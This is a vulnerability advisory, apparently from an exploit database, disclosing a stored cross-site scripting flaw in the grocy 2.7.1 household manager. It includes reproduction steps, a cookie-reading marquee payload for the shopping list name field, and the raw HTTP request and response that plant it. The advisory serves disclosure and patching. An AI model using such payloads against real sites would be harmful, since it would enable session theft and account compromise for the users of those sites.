Grocy 2.7.1 Cross Site Scripting

2020.09.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting # Date: 2020-09-06 # Exploit Author: Mufaddal Masalawala # Vendor Homepage: https://berrnd.de/ # Software Link: https://github.com/grocy/grocy # Version: 2.7.1 # Tested on: Kali Linux 2020.3 # Proof Of Concept: grocy household management solution v2.7.1, allows stored XSS and HTML Injection, via Create Shopping List module, that is rendered upon deletiing that Shopping List. To exploit this vulnerability: 1. Login to the application 2. Go to 'Shooping List' module 3. Click on 'New Shopping List' module 4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name' input field. 5. Click Save 6. Click 'Delete Shopping List' *#REQUEST -->* POST /api/objects/shopping_lists HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/shoppinglist/new Content-type: application/json Content-Length: 38 Connection: close Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd {"name":"<marquee onstart=alert(1)> "} *#RESPONSE -->* HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 06 Sep 2020 12:53:13 GMT Content-Type: application/json Connection: close X-Powered-By: PHP/7.3.21 Content-Length: 26 {"created_object_id":"21"} Regards, Mufaddal M


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top